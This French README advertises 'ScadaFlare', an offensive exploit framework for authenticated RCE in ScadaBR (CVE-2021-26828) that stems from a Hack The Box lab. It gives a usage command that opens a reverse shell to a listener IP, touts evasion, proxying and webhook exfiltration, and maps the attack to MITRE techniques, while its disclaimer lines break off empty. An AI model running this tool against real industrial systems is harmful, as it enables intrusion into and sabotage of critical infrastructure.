
ScadaFlare Framework d'exploitation RCE authentifiée pour ScadaBR (CVE-2021-26828) OpenPLC ScadaBR
Un exploit RCE modulaire post-authentification ciblant ScadaBR <1.1.0, amélioré pour les opérations d'équipe rouge.

.jsp armé via view_edit.shtmCet exploit a été développé lors de l'analyse du scénario HTB Pro Lab : Alchemy. Le PoC original de Fellipe Oliveira était solide mais :
Écrit en Python 2
Manquait de fonctionnalités modernes comme le support des proxy, le nettoyage du shell, le chaînage d'énumération
Était difficile à étendre ou intégrer dans les workflows des équipes rouges
Cette version, ScadaFlare, est une réécriture complète en Python 3 avec un support modulaire, plusieurs stratégies d'évasion, le remplacement de la détection d'OS, l'intégration de webhooks, le support des proxy SOCKS et des chaînes d'énumération pour une utilisation opérationnelle réelle.
python3 scadaflare.py http://172.16.0.20:80 admin admin \
--reverse-ip 10.10.14.44 --reverse-port 4445 \
--verbose --cleanup
ScadaFlare est conçu exclusivement pour :
Une utilisation non autorisée contre des systèmes industriels réels peut :
En utilisant cet outil, vous acceptez l'entière responsabilité de :
Licence MIT – voir LICENSE
| Phase | Technique | ID |
|---|
| Accès initial (post-authentification) | Comptes valides | T1078 |
| Exécution | Exploitation d'application publique | T1190 |
| Exécution de commandes | Web Shell | T1505.003 |
| Actions de privilège | Modification de contenu web | T1505 |
| Accès aux identifiants | Identifiants dans les fichiers de configuration | T1552.001 |
| Découverte | Découverte de système distant | T1018 |
| Exfiltration | Exfiltration via service web | T1567.002 |
| Évasion de la défense | Tunnel proxy et protocole | T1090 |